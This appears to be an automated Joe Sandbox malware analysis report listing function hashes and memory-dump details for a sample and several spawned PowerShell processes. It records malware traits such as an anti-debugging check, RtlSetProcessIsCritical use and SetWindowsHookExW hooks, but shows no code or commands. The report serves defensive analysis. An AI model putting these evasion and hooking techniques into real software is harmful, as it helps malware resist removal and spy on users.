Source File: 00000000.00000002.2987103485.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9bad0000_03VPFXH490.jbxd

Similarity

API ID: CheckDebuggerPresentRemote
String ID:
API String ID: 3662101638-0
Opcode ID: 4739d77076279e19567c2ecf0307a9938b1576a2cc15e434b2e751bf217797c6
Instruction ID: 5b9bcbc3e08d48333de66041c7bfaf64b6f8df1787409344ba0dca63e49d9c68
Opcode Fuzzy Hash: 4739d77076279e19567c2ecf0307a9938b1576a2cc15e434b2e751bf217797c6
Instruction Fuzzy Hash: FE31113190875C8FCB58DF58C84A7E97BE0EF69321F0542ABD489D7292DB34A806CB91

Function 00007FFD9BAD9420 Relevance: 1.0, Instructions: 992
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2987103485.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9bad0000_03VPFXH490.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ddca627165bf03b814351387d86fdc7473d5ae3b58aafbc4905cb98815c122e6
Instruction ID: 7637bade9336d964ae07915baaca5a772608dd08b01aafdaa92ff2e9644e79b3
Opcode Fuzzy Hash: ddca627165bf03b814351387d86fdc7473d5ae3b58aafbc4905cb98815c122e6
Instruction Fuzzy Hash: 75625D34B1D90D4BEBA8FB788469A7D63D2EFD8310B914679D41EC32D6DE68EC428740

Function 00007FFD9BAD58B6 Relevance: .5, Instructions: 472COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2987103485.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9bad0000_03VPFXH490.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d29d71242f5be3b619d286ea7cd6ff381ae817a6d208de927e66e528bdd72d57
Instruction ID: 6ebc9818250a0ba3759be919f5b3f7c211b12359038b8a3440b17f19f8400da8
Opcode Fuzzy Hash: d29d71242f5be3b619d286ea7cd6ff381ae817a6d208de927e66e528bdd72d57
Instruction Fuzzy Hash: CDF19630A09A8D8FEBA8DF28CC557E937D1FF95310F04426EE84DC72A5DB74A9458B81

Function 00007FFD9BAD6662 Relevance: .5, Instructions: 458COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2987103485.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9bad0000_03VPFXH490.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68e054403acf774a22bdfa307ac966f86535c278081413393439deaa4edb7824
Instruction ID: ff7e4a74e13d1b82e90b4cc76670a16795adfad70c10ec448a1bc5d223e5f83d
Opcode Fuzzy Hash: 68e054403acf774a22bdfa307ac966f86535c278081413393439deaa4edb7824
Instruction Fuzzy Hash: 79E1A530A09A4D8FEBA8DF68C8657E977D1FF94310F04436EE84DC72A5DE74A9448B81

Function 00007FFD9BAD1771 Relevance: .4, Instructions: 396COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2987103485.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9bad0000_03VPFXH490.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74df891c8b5607f6a24c779f603fda78229927d8da15440c73c4fb440dffb10c
Instruction ID: 3218a39f803588f573035a911412d2091e8e92a0e32629c1d2eff392ca95c348
Opcode Fuzzy Hash: 74df891c8b5607f6a24c779f603fda78229927d8da15440c73c4fb440dffb10c
Instruction Fuzzy Hash: 2DC1E620B1D94D4FEBA8E778847967D77D2EFE9301F054279E04EC32E2DE68A9028741

Function 00007FFD9BAD8A0D Relevance: 1.6, APIs: 1, Instructions: 144
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlSetProcessIsCritical.NTDLL ref: 00007FFD9BAD8AE2

Memory Dump Source

Source File: 00000000.00000002.2987103485.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9bad0000_03VPFXH490.jbxd

Similarity

API ID: CriticalProcess
String ID:
API String ID: 2695349919-0
Opcode ID: de9310b6029caddaac4316b7e59e1caf203d592065738c465a45735d84902973
Instruction ID: 8d5fd66a79c5a12f0862893288a01b08d7ba9f545853f2f42f47b92514e7fab8
Opcode Fuzzy Hash: de9310b6029caddaac4316b7e59e1caf203d592065738c465a45735d84902973
Instruction Fuzzy Hash: 3341053190C6488FDB18DF98C849BE9BBF0FF56311F04426EE09AD3592CB746846CB91

Function 00007FFD9BAD83B5 Relevance: 1.6, APIs: 1, Instructions: 143
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowsHookExW.USER32 ref: 00007FFD9BAD9021

Memory Dump Source

Source File: 00000000.00000002.2987103485.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9bad0000_03VPFXH490.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: e566d3f0bc9b56bbc1a3e56b1249e0246ce25ebe45ea51e7b397c12a54a83797
Instruction ID: 3c418ecc639f5f34b21e8ee4ebba134f748944c7d798575afb0db6b2f954731e
Opcode Fuzzy Hash: e566d3f0bc9b56bbc1a3e56b1249e0246ce25ebe45ea51e7b397c12a54a83797
Instruction Fuzzy Hash: 1A410B71A0DA5C4FDB28DF6CD8156B97BE1EFA9325F00427FD05DC3292CA64A84687C1

Function 00007FFD9BAD8F58 Relevance: 1.6, APIs: 1, Instructions: 134
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowsHookExW.USER32 ref: 00007FFD9BAD9021

Memory Dump Source

Source File: 00000000.00000002.2987103485.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9bad0000_03VPFXH490.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: 8d0fc7ae2d7abf559372b483f3183a64e9691a5a7c148b1cde59641e9dac2956
Instruction ID: 3d1d2ef250e9eb46e8f5dadb166377bfea51b1064a5d4a568d4c0e74edad3d03
Opcode Fuzzy Hash: 8d0fc7ae2d7abf559372b483f3183a64e9691a5a7c148b1cde59641e9dac2956
Instruction Fuzzy Hash: F6310B31A1CA5D4FDB18DB6C981A6F97BE1EF99325F00027ED05DC3292CE64A81687C1

Function 00007FFD9BAD83C0 Relevance: 1.6, APIs: 1, Instructions: 130
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowsHookExW.USER32 ref: 00007FFD9BAD9021

Memory Dump Source

Source File: 00000000.00000002.2987103485.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9bad0000_03VPFXH490.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: 09ec0d54e0b217c5cdf32b5cf4ef08d21d1742404bab8fa7fa882a2295986b4d
Instruction ID: c82a2aa85767f339cc7c4c7f543f4608ad563111e0d931d51e41189ef5eab6cd
Opcode Fuzzy Hash: 09ec0d54e0b217c5cdf32b5cf4ef08d21d1742404bab8fa7fa882a2295986b4d
Instruction Fuzzy Hash: A4311A31A1CA4C4FDB18EF6CD8156B977E1EF99325F00427ED05DC3296CA70A80687C1

Analysis Process: powershell.exePID: 7448, Parent PID: 7316COMMON

Executed Functions

Function 00007FFD9BAB644D Relevance: .7, Instructions: 693COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1785488266.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9bab0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c951b9fb419f00ef265b906002db899a664142e9501cda7faf86e9e74b60601d
Instruction ID: d14b059af8bf2b5287d345dd608c911a33672894a8d1bf70ebe6a5339a5769a7
Opcode Fuzzy Hash: c951b9fb419f00ef265b906002db899a664142e9501cda7faf86e9e74b60601d
Instruction Fuzzy Hash: 97D19231A08A5D8FDF98DF5CC464AADBBE1FF68310F15426AD41DD7296CA74E881CB80

Function 00007FFD9BB86605 Relevance: .4, Instructions: 436COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1786254814.00007FFD9BB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9bb80000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c52738f46624ffb18275c23bc8f823ffcb708269d799e6f9734efafea2e01d6
Instruction ID: e29a57c057c3934c80b7233e5fcbbd9fe3aab6af539483885ad562f4cd619e68
Opcode Fuzzy Hash: 7c52738f46624ffb18275c23bc8f823ffcb708269d799e6f9734efafea2e01d6
Instruction Fuzzy Hash: B8D12421B0EACE0FEBA5AB6858655B57B91FF16318F0901BFD49EC70E3D928A905C341

Function 00007FFD9BAB9738 Relevance: .1, Instructions: 143COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1785488266.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9bab0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8654b214881c40ccc5c65bc5133354e74050f6020f631a9153105d44c42dcf3a
Instruction ID: c9c6235bee29549b8fad13729fb067fa74284c916350c8d97bf9838d225ac7ae
Opcode Fuzzy Hash: 8654b214881c40ccc5c65bc5133354e74050f6020f631a9153105d44c42dcf3a
Instruction Fuzzy Hash: BE412A71A1DA8C8FDB589F5C981A6F8BBE0FB94310F10812FE058C3252DA60B955CBC2

Function 00007FFD9B99E380 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1784816635.00007FFD9B99D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B99D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b99d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4be5ca351c44e622fcd9e43a3d3e7cf955f59d941f3927cb99f7b1171c50117e
Instruction ID: c2a6d7d2366ffa705264a33385e7b274d6140bec677150679313bd32cbe5490e
Opcode Fuzzy Hash: 4be5ca351c44e622fcd9e43a3d3e7cf955f59d941f3927cb99f7b1171c50117e
Instruction Fuzzy Hash: 0A41277150EFC85FE756CB28D8519523FF0EF52310B1505EFD088CB1A3D625A80AC792

Function 00007FFD9BABA47C Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1785488266.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9bab0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1571319dc1d6d474b673230493316fde40d3a7994a754a37980872d67d1f362
Instruction ID: 3b4ca5c64498dce4fe619b2d140ce3871668b2c0d2fe224d295f3ea86997f153
Opcode Fuzzy Hash: a1571319dc1d6d474b673230493316fde40d3a7994a754a37980872d67d1f362
Instruction Fuzzy Hash: 9D212B3090C74C4FDB59DBAC984A7E97FF0EB56321F04426FD058C7152DA749415CB91

Function 00007FFD9BABA065 Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1785488266.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9bab0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ee5bb6c5713c8207640c09ba03e0f54031b38f532e2f4706e46b9a0cb4171a0
Instruction ID: b0188276e983bb649b220287ebd683664020351d70bf08cb267b405a6ec6ff89
Opcode Fuzzy Hash: 4ee5bb6c5713c8207640c09ba03e0f54031b38f532e2f4706e46b9a0cb4171a0
Instruction Fuzzy Hash: 4921F622A0E6DB1ADB12AB6C98714E53F50DF1222EF4942F7E8AD8F0E3ED152405C752

Function 00007FFD9BAB33B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1785488266.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9bab0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
Instruction ID: 17cf545b06c68c12749fae18c059a1fd3c0929f1bc305d672c46b898a287b68f
Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
Instruction Fuzzy Hash: 8301A73120CB0C4FD748EF0CE051AA6B3E0FF85320F10056EE58AC36A1DA32E882CB45

Function 00007FFD9BB8414D Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1786254814.00007FFD9BB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9bb80000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 65ddf82bc1de9b4cac1f7342b007d12a5ffdeb791ff7ffa414287a2e11141245
Instruction ID: 2b7d983186ac8b342ef143f7b20347533711948212db3ddb9e9f3eee0f7c0e5b
Opcode Fuzzy Hash: 65ddf82bc1de9b4cac1f7342b007d12a5ffdeb791ff7ffa414287a2e11141245
Instruction Fuzzy Hash: BCF09032B0D9094FD769EA4CE45189477E0FF55324B1200BAE15DC71B3CA35EC408740

Function 00007FFD9BB84400 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1786254814.00007FFD9BB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9bb80000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 218580c49e25abb8330f7eaf565f20b386a9456a9fb043c66e0183da9ae0aabb
Instruction ID: f8e1fd036749847bda479d52db41c666d8f44e540076f2dd177018c485acfb5b
Opcode Fuzzy Hash: 218580c49e25abb8330f7eaf565f20b386a9456a9fb043c66e0183da9ae0aabb
Instruction Fuzzy Hash: 4FF0BE32A0E9498FD7A8EA4CE0618A873E0FF05328B1600BAE15DC70A3CA25AC40C740

Function 00007FFD9BB841D1 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1786254814.00007FFD9BB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9bb80000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
Instruction ID: 2dff48247507cb871ad432cab4ca7b8e5aeb9198aba82777103ccfbb354ce81a
Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
Instruction Fuzzy Hash: 6CE01A31B0C8088FDAB9EA4CE0519A977E1FB98325B1201BBD14EC75B1CA32ED518B80

Non-executed Functions

Function 00007FFD9BAB8BFA Relevance: 5.1, Strings: 4, Instructions: 85COMMON

Download Yara Rule

Strings

M_^F, xrefs: 00007FFD9BAB8C7A
M_^7, xrefs: 00007FFD9BAB8C12
M_^4, xrefs: 00007FFD9BAB8BFA
M_^J, xrefs: 00007FFD9BAB8C8A

Memory Dump Source

Source File: 00000001.00000002.1785488266.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9bab0000_powershell.jbxd

Similarity

API ID:
String ID: M_^4$M_^7$M_^F$M_^J
API String ID: 0-622050427
Opcode ID: 080c982ac5c94dabc77c050bd4f89e970741ddc133ea21d5bcda1e5c047230bc
Instruction ID: 62e749294f243f73b03f876d386388aef594bfc7f5e75aab27cdd844d1464f7b
Opcode Fuzzy Hash: 080c982ac5c94dabc77c050bd4f89e970741ddc133ea21d5bcda1e5c047230bc
Instruction Fuzzy Hash: 7121C5A77085659ED316BB7DAC149E93740CFA827A78507F3E1A9CF093F9146086CAD0

Analysis Process: powershell.exePID: 7684, Parent PID: 7316COMMON

Executed Functions

Function 00007FFD9BB86605 Relevance: .4, Instructions: 438COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1878912012.00007FFD9BB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bb80000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d40327cf8c2a7fc64cf6c055dde5abcc86be13c572dd944f1671b698280dcaf8
Instruction ID: 8f8a73dcbf79cd11846ea8b1004fe7919cac86e00ba77d20a02cdcbcb1fccda3
Opcode Fuzzy Hash: d40327cf8c2a7fc64cf6c055dde5abcc86be13c572dd944f1671b698280dcaf8
Instruction Fuzzy Hash: 3FD13631B0EA8E0FEBA59B6858655B57B90FF16318F0901BFD45EC71E3DA28A905C341

Function 00007FFD9BAB9750 Relevance: .2, Instructions: 153COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1878337739.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bab0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09901dcc2e4adbf72adb646f83273be74434236c4d648616ff948f676ad26f9b
Instruction ID: 585af95bd724a19b0b774d4722f9a6f7bbf28dd9cb1cf4a3202bcfe200abde22
Opcode Fuzzy Hash: 09901dcc2e4adbf72adb646f83273be74434236c4d648616ff948f676ad26f9b
Instruction Fuzzy Hash: E1412A71A0DBC84FD719DB6C9C1A6B9BFE0EB55310F0441AFD09883293DA64B955CBC2

Function 00007FFD9B99EE20 Relevance: .1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1877729463.00007FFD9B99D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B99D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b99d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e728726e58e33294fa67e3a0cea8787a7a109abd1dac2e5cc0a92f2cfdaa6bb
Instruction ID: 5d0548e46a9b506c1bd900790c1f1478e9ab5db0b684601bb28e85918457a4e2
Opcode Fuzzy Hash: 1e728726e58e33294fa67e3a0cea8787a7a109abd1dac2e5cc0a92f2cfdaa6bb
Instruction Fuzzy Hash: D341287180EFC45FE7969B3998519523FF0EF53320B1605EFD088CB1A3D625A84AC7A2

Function 00007FFD9BABA4BC Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1878337739.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bab0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc89bbc0997eecdb67615830f77b098c97eb30ac00958e02d30b6819ebda8b43
Instruction ID: f65a42eadb978fa0401effc653f4df291b684017bbe0c748dad84ed587a10a1e
Opcode Fuzzy Hash: cc89bbc0997eecdb67615830f77b098c97eb30ac00958e02d30b6819ebda8b43
Instruction Fuzzy Hash: A921F63090CB4C4FDB59DBACD84ABE97BE0EB56321F04426FD44DC7162DA74A416CBA1

Function 00007FFD9BAB33B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1878337739.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bab0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
Instruction ID: 17cf545b06c68c12749fae18c059a1fd3c0929f1bc305d672c46b898a287b68f
Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
Instruction Fuzzy Hash: 8301A73120CB0C4FD748EF0CE051AA6B3E0FF85320F10056EE58AC36A1DA32E882CB45

Function 00007FFD9BABA0FB Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1878337739.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bab0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf14774d37f7a2e19faf78c62af4df176e93dd1f9950ada18dba4e8c0e255430
Instruction ID: c616dab34118bcbbe5ab878098e921facf1ab4e632e90662459c6e4a42de9f99
Opcode Fuzzy Hash: cf14774d37f7a2e19faf78c62af4df176e93dd1f9950ada18dba4e8c0e255430
Instruction Fuzzy Hash: 5E01B53190D3DA4FCB16EF3894654E43FA0DF16119B4942FBE8AD8F0A3DA246408C7A1

Function 00007FFD9BB8414D Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1878912012.00007FFD9BB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bb80000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 65ddf82bc1de9b4cac1f7342b007d12a5ffdeb791ff7ffa414287a2e11141245
Instruction ID: 2b7d983186ac8b342ef143f7b20347533711948212db3ddb9e9f3eee0f7c0e5b
Opcode Fuzzy Hash: 65ddf82bc1de9b4cac1f7342b007d12a5ffdeb791ff7ffa414287a2e11141245
Instruction Fuzzy Hash: BCF09032B0D9094FD769EA4CE45189477E0FF55324B1200BAE15DC71B3CA35EC408740

Function 00007FFD9BB84400 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1878912012.00007FFD9BB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bb80000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 218580c49e25abb8330f7eaf565f20b386a9456a9fb043c66e0183da9ae0aabb
Instruction ID: f8e1fd036749847bda479d52db41c666d8f44e540076f2dd177018c485acfb5b
Opcode Fuzzy Hash: 218580c49e25abb8330f7eaf565f20b386a9456a9fb043c66e0183da9ae0aabb
Instruction Fuzzy Hash: 4FF0BE32A0E9498FD7A8EA4CE0618A873E0FF05328B1600BAE15DC70A3CA25AC40C740

Function 00007FFD9BB841D1 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1878912012.00007FFD9BB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bb80000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
Instruction ID: 2dff48247507cb871ad432cab4ca7b8e5aeb9198aba82777103ccfbb354ce81a
Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
Instruction Fuzzy Hash: 6CE01A31B0C8088FDAB9EA4CE0519A977E1FB98325B1201BBD14EC75B1CA32ED518B80

Non-executed Functions

Function 00007FFD9BAB8BF2 Relevance: 10.1, Strings: 8, Instructions: 85COMMON

Download Yara Rule

Strings

M_^Y, xrefs: 00007FFD9BAB8CBA
M_^J, xrefs: 00007FFD9BAB8C62
M_^Q, xrefs: 00007FFD9BAB8C8A
M_^K, xrefs: 00007FFD9BAB8C6A
M_^8, xrefs: 00007FFD9BAB8BF2
M_^<, xrefs: 00007FFD9BAB8C12
M_^N, xrefs: 00007FFD9BAB8C72
M_^?, xrefs: 00007FFD9BAB8C2A

Memory Dump Source

Source File: 00000004.00000002.1878337739.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bab0000_powershell.jbxd

Similarity

API ID:
String ID: M_^8$M_^<$M_^?$M_^J$M_^K$M_^N$M_^Q$M_^Y
API String ID: 0-962139525
Opcode ID: 32ba26589fa0e7a62dd8a312b3dc4cc8d233eb561294beb8cf2edc3a6d3793b8
Instruction ID: 66d0e04f0872e0335e4fe59ef7b4c469ceb008a922e36b624b51b9563710bd55
Opcode Fuzzy Hash: 32ba26589fa0e7a62dd8a312b3dc4cc8d233eb561294beb8cf2edc3a6d3793b8
Instruction Fuzzy Hash: 9021C5737045258AD315766CBC519D87780DF6837E38603F3F429CF193E91864878A81

Function 00007FFD9BAB89F2 Relevance: 6.3, Strings: 5, Instructions: 97COMMON

Download Yara Rule

Strings

M_^, xrefs: 00007FFD9BAB8A7A
M_^, xrefs: 00007FFD9BAB89F2
M_^, xrefs: 00007FFD9BAB8A22
M_^, xrefs: 00007FFD9BAB8A12
M_^, xrefs: 00007FFD9BAB8A62

Memory Dump Source

Source File: 00000004.00000002.1878337739.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bab0000_powershell.jbxd

Similarity

API ID:
String ID: M_^$M_^$M_^$M_^$M_^
API String ID: 0-679677686
Opcode ID: 6a43399540d15f33040c7fca20a72a0bea8980af99d86fbb573f6df6a98ea58c
Instruction ID: 24f0dd4a0c73be3b2d1b16f6e459901816cacccf7c808b9b218362bedb53504b
Opcode Fuzzy Hash: 6a43399540d15f33040c7fca20a72a0bea8980af99d86fbb573f6df6a98ea58c
Instruction Fuzzy Hash: 6631E8A2F0E6E74BE726976D48754D53BD0EF11228B0F03FAC4F98F1E3AC5865028651

Analysis Process: powershell.exePID: 7956, Parent PID: 7316COMMON

Executed Functions

Function 00007FFD9BB66605 Relevance: .4, Instructions: 440COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2019711195.00007FFD9BB60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9bb60000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3043a5a8e2799521d01af38aca2289ad06c82601193a6478a69919a362102647
Instruction ID: 6f6fde0db86108c866e831fff35e94a045db5fc9864c9d6c4778dfa6637b110f
Opcode Fuzzy Hash: 3043a5a8e2799521d01af38aca2289ad06c82601193a6478a69919a362102647
Instruction Fuzzy Hash: 38D13532A0EA8E8FEBA59A6858655F57B90FF16328B0901BFD45EC70E3D918AD04C341

Function 00007FFD9BA99FA5 Relevance: .4, Instructions: 391COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2018203278.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9ba90000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18ee88038ce7fa785c058186e931da3596850311f32a6d19bd0d7768374c0b3f
Instruction ID: a5401f1fecb3ba9aaeda5599ff18370efe58368f40e5a3f58c89c323cb1f7759
Opcode Fuzzy Hash: 18ee88038ce7fa785c058186e931da3596850311f32a6d19bd0d7768374c0b3f
Instruction Fuzzy Hash: 6D51D31AA0F6DA1FE722976C9C750D43FA0EF5222970901F7D4D8CF0E3ED4869499391

Function 00007FFD9BA9A9B8 Relevance: .2, Instructions: 244COMMON

Download Yara Rule

Memory Dump Source

